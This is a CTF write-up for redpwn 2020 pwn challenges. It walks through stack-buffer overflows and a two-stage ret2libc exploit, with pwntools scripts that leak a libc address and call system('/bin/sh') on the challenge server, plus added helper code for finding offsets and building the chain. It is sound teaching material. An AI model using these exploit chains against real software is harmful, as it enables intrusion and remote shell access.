REDPWN CTF Pwning Writeup

coffer-overflow-0 is a very basic overflow challenge. The code is as follows:

coffer-overflow-0 code

We just have to overflow the 16-byte buffer 'name' (send more than 16 characters) to get a shell on the remote server. The flag is flag{b0ffer_0verf10w_3asy_as_123}.

coffer-overflow-1 code

First let us find the offset from the buffer to the variable we need to overwrite. To do that, let's look at the disassembly.

disassembly of coffer-overflow-1

Here we can see at <+117> that rax is compared against the value stored at $rbp-0x8, which is the variable code. Let us overflow the buffer with a cyclic pattern and see which part of the pattern lands at $rbp-0x8.

Calculate offset

Looking up the value found at $rbp-0x8 in the pattern gives an offset of 24 bytes. We can then write a simple script that sends 24 bytes of padding followed by the value 0xcafebabe, which overwrites code.

from pwn import *

address = 0xcafebabe          # the value the binary compares code against

#p = process('./coffer-overflow-1')
p = remote('2020.redpwnc.tf', 31255)

payload = b'a' * 24           # fill name and the bytes between it and code
payload += p64(address)       # overwrite code at $rbp-0x8

p.recvuntil(b'with?')
p.sendline(payload)
p.interactive()

This gives us a shell and we can read the flag: flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe}.
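The offset-finding step for coffer-overflow-1, as an added self-contained example (not the writeup's own code): it reimplements the de Bruijn pattern behind pwntools' cyclic() and cyclic_find() so that it runs without pwntools, and exercises it against a small model of the vulnerable frame. The model assumes a 16-byte name buffer at rbp-0x20 with code at rbp-0x8 (the layout a 24-byte offset implies, with 8 bytes of other locals or padding in between); it deliberately does not model the saved rbp and return address beyond code.

```python
import struct
from functools import lru_cache

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


@lru_cache(maxsize=None)
def de_bruijn(n=4, alphabet=ALPHABET):
    """de Bruijn sequence B(k, n): every n-byte window occurs exactly once,
    so a crash value maps back to a unique offset. This is the same
    construction pwntools' cyclic() uses (its output starts 'aaaabaaac...')."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (pwntools: cyclic(length))."""
    return de_bruijn(n)[:length]


def cyclic_find(value, n=4):
    """Offset of a crash value inside the pattern (pwntools: cyclic_find()).
    Accepts the integer gdb prints for x/gx $rbp-0x8, or raw bytes; only the
    first n bytes (little-endian, i.e. the lowest ones) are looked up."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return de_bruijn(n).find(value[:n])


# Assumed frame layout for the model (see the lead-in).
NAME_SIZE = 16      # char name[16] at rbp-0x20
CODE_OFFSET = 24    # name -> code at rbp-0x8, as read off the disassembly
FRAME_SIZE = 32     # bytes from name up to (not including) the saved rbp


def vulnerable_frame(line):
    """Model of coffer-overflow-1's frame: an unbounded read into name copies
    every byte we send, so anything past NAME_SIZE spills over the locals
    after it. Returns the qword that ends up in code."""
    frame = bytearray(FRAME_SIZE)
    data = line[:FRAME_SIZE]
    frame[:len(data)] = data
    return struct.unpack_from("<Q", frame, CODE_OFFSET)[0]


def find_offset():
    """The gdb workflow: overflow with a cyclic pattern, read what landed in
    code, and look that value up in the pattern."""
    pattern = cyclic(64)                 # longer than the frame, so code is hit
    landed = vulnerable_frame(pattern)   # what 'x/gx $rbp-0x8' would show
    return cyclic_find(landed)


def build_payload(offset, value):
    """Padding up to code, then the qword it must hold."""
    return b"a" * offset + struct.pack("<Q", value)


if __name__ == "__main__":
    off = find_offset()
    print("offset:", off)
    print("code after payload: %#x" % vulnerable_frame(build_payload(off, 0xcafebabe)))
```

Against a real target the only difference is that vulnerable_frame() is replaced by the process under gdb: send cyclic(64), read $rbp-0x8 after the compare, and feed that value to cyclic_find().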

the-library code

Let us check what security features are enabled before proceeding further.

NX is enabled, which means we cannot execute shellcode from the stack, so we do a ret2libc attack instead. The exploit below also relies on the binary having no PIE and no stack canary: it uses fixed PLT, GOT and main addresses and reaches the return address with only 24 bytes of padding.

To do a ret2libc attack we first need a libc address to compute the base from. We call puts through the PLT with the GOT entry of puts as its argument, which prints the resolved libc address of puts, and then return to main so we can overflow a second time. The following code snippet does this:

from pwn import *

p = remote('2020.redpwnc.tf', 31350)
#p = process('./the-library')
binary = ELF('./the-library')
context.update(arch='amd64')
rop = ROP(binary)

# 'pop rdi; ret' from the binary itself: the first argument to puts goes in rdi
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
#print("pop rdi: ", hex(pop_rdi))

payload = b'a' * 24                      # padding up to the saved return address
payload += p64(pop_rdi)
payload += p64(binary.got['puts'])       # rdi = &GOT[puts]
payload += p64(binary.plt['puts'])       # puts(&GOT[puts]) prints the resolved address
payload += p64(binary.symbols['main'])   # back to main for a second overflow

p.recvuntil(b'name?\n')
p.sendline(payload)

p.recvlines(2)                           # the program's own output before the leak
libc_leak = p.recv()[0:6]                # puts stops at the first NUL: 6 significant bytes
libc_puts = u64(libc_leak.ljust(8, b'\x00'))
print("puts: ", hex(libc_puts))

We get the address of puts as 0x7ff77d1109c0. ASLR moves libc by whole pages, so only the low 12 bits (0x9c0) are fixed by the build, and those are what identify it. We use https://libc.blukat.me/ to search the database with them and find the library to be libc6_2.27-3ubuntu1_amd64.

Subtracting the offset of puts in that libc from the leak gives the base address. From the base we compute system and the address of a "/bin/sh" string inside libc, and send a second chain that calls system("/bin/sh"). The chain starts with an extra ret gadget (pop_rdi + 1: pop rdi is the single byte 0x5f, so the ret of the gadget sits one byte after it); it shifts the stack by 8 bytes so that system is entered with the 16-byte alignment glibc expects, without which it crashes on a movaps. The following is the final exploit.

from pwn import *

p = remote('2020.redpwnc.tf', 31350)
#p = process('./the-library')
libc = ELF('/home/rasput1n/Downloads/libc6_2.27-3ubuntu1_amd64.so')   # from libc.blukat.me
binary = ELF('./the-library')
context.update(arch='amd64')
rop = ROP(binary)

pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address

# stage 1: leak the address of puts and return to main
payload = b'a' * 24
payload += p64(pop_rdi)
payload += p64(binary.got['puts'])
payload += p64(binary.plt['puts'])
payload += p64(binary.symbols['main'])

p.recvuntil(b'name?\n')
p.sendline(payload)

p.recvlines(2)
libc_leak = p.recv()[0:6]
libc_puts = u64(libc_leak.ljust(8, b'\x00'))
libc_base = libc_puts - libc.symbols['puts']    # leak minus the symbol's offset in this build
print("puts: ", hex(libc_puts))
print("base: ", hex(libc_base))

# stage 2: system("/bin/sh") with the stack realigned
payload = 24 * b'A'
payload += p64(pop_rdi + 1)                                   # the ret right after pop rdi: 16-byte alignment for system
payload += p64(pop_rdi)
payload += p64(libc_base + next(libc.search(b'/bin/sh')))    # rdi = "/bin/sh"
payload += p64(libc_base + libc.symbols['system'])
print(payload)

p.sendline(payload)

p.interactive()

We get a shell and read the flag: flag{jump_1nt0_th3_l1brary}.
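The libc identification and second-stage chain of the-library, as an added example that is not the writeup's code and does not need pwntools: it parses the raw leak the way the script above does, checks the leak against the chosen libc build before trusting it, computes the base, and builds the realigned system("/bin/sh") chain. Assumptions, all labelled in the code: the symbol offsets are the libc database values for libc6_2.27-3ubuntu1_amd64 and should be verified against your own copy; the captured bytes are constructed from the 0x7ff77d1109c0 leak in the writeup; the gadget address 0x401ab3 used in the demo is made up, since the page does not give the real one.

```python
import struct


def p64(value):
    """Pack a little-endian qword (what pwntools' p64 does)."""
    return struct.pack("<Q", value)


def u64(raw):
    """Unpack up to 8 little-endian bytes, zero-padding short input (pwntools' u64 after ljust)."""
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# Assumed symbol offsets for libc6_2.27-3ubuntu1_amd64 as listed by the libc
# database. Verify against your copy: ELF(path).symbols['puts'], ['system'],
# and next(ELF(path).search(b"/bin/sh")).
PUTS_OFFSET = 0x0809c0
SYSTEM_OFFSET = 0x04f440
BINSH_OFFSET = 0x1b3e9a

# Constructed stand-in for what p.recv() returns after p.recvlines(2): puts()
# wrote the resolved address 0x7ff77d1109c0 (the writeup's leak) as raw bytes
# up to its first NUL byte, then a newline.
CAPTURED_LEAK = b"\xc0\x09\x11\x7d\xf7\x7f\n"


def parse_puts_leak(raw):
    """Recover the leaked pointer: a user-space x86-64 pointer has six
    significant bytes, so take those and let u64 zero-extend them."""
    return u64(raw[:6])


def libc_base_from_puts(leaked_puts, puts_offset=PUTS_OFFSET):
    """libc load address, with the check the libc database itself relies on:
    ASLR shifts libc by whole pages, so the low 12 bits of puts are fixed per
    build. A mismatch means the wrong build (or a mangled leak), and the
    final chain would jump to garbage."""
    if (leaked_puts & 0xfff) != (puts_offset & 0xfff):
        raise ValueError("leak low bits %#x do not match puts offset low bits %#x"
                         % (leaked_puts & 0xfff, puts_offset & 0xfff))
    base = leaked_puts - puts_offset
    assert base & 0xfff == 0, "libc base must be page aligned"
    return base


def system_chain(libc_base, pop_rdi, padding=24):
    """Second-stage chain: system("/bin/sh") with the stack realigned.
    'pop rdi' is the single byte 0x5f, so pop_rdi + 1 is the gadget's 'ret'.
    When main's own ret pops the first chain entry, rsp is 16-byte aligned;
    a function expects to be entered with rsp 8 past a 16-byte boundary (as
    after a call), and glibc's system() uses movaps on the stack, so the
    extra ret shifts the chain by 8 bytes to satisfy that."""
    ret = pop_rdi + 1
    binsh = libc_base + BINSH_OFFSET
    system = libc_base + SYSTEM_OFFSET
    return b"A" * padding + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)


def chain_qwords(payload, padding=24):
    """Split a chain back into the qwords the CPU will pop, for inspection."""
    body = payload[padding:]
    return [u64(body[i:i + 8]) for i in range(0, len(body), 8)]


if __name__ == "__main__":
    leaked = parse_puts_leak(CAPTURED_LEAK)
    base = libc_base_from_puts(leaked)
    print("puts: %#x  base: %#x" % (leaked, base))
    for qword in chain_qwords(system_chain(base, 0x401ab3)):   # 0x401ab3: made-up gadget address
        print("%#018x" % qword)
```

If libc_base_from_puts() raises, pick a different candidate from the database before sending anything; a chain built from the wrong build is the usual reason a ret2libc that "should work" just crashes the target.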
